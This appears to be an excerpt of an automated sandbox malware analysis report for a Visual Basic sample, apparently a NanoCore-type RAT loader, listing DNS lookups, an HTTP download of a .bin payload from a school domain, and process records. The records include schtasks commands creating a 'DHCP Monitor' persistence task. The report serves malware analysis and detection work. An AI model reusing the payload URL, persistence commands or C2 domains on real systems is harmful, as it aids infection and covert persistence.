                                          Feb 23, 2021 11:58:08.652335882 CET8.8.8.8192.168.2.50xfacaNo error (0)ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu10.2.118.40A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • mtspsmjeli.sch.id

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549741103.150.60.24280C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 23, 2021 11:57:29.519809961 CET9436OUTGET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: mtspsmjeli.sch.id
                                          Cache-Control: no-cache
                                          Feb 23, 2021 11:57:29.758059978 CET9436INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Last-Modified: Wed, 17 Feb 2021 16:04:20 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 207936
                                          Date: Tue, 23 Feb 2021 10:57:29 GMT
                                          Server: LiteSpeed


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:11:53:33
                                          Start date:23/02/2021
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
                                          Imagebase:0x400000
                                          File size:106496 bytes
                                          MD5 hash:532E58083CF5638B05F617FCBBB5D63B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Visual Basic
                                          Reputation:low

                                          General

                                          Start time:11:57:14
                                          Start date:23/02/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
                                          Imagebase:0x780000
                                          File size:53248 bytes
                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Start time:11:57:15
                                          Start date:23/02/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:31
                                          Start date:23/02/2021
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
                                          Imagebase:0xa20000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:31
                                          Start date:23/02/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:32
                                          Start date:23/02/2021
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
                                          Imagebase:0xa20000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:32
                                          Start date:23/02/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
                                          Imagebase:0x8c0000
                                          File size:53248 bytes
                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Start time:11:57:32
                                          Start date:23/02/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:32
                                          Start date:23/02/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:11:57:34
                                          Start date:23/02/2021
                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                          Imagebase:0x2f0000
                                          File size:53248 bytes
                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Antivirus matches:
                                          • Detection: 0%, Metadefender, Browse
                                          • Detection: 0%, ReversingLabs
                                          Reputation:high

                                          General

                                          Start time:11:57:35
                                          Start date:23/02/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >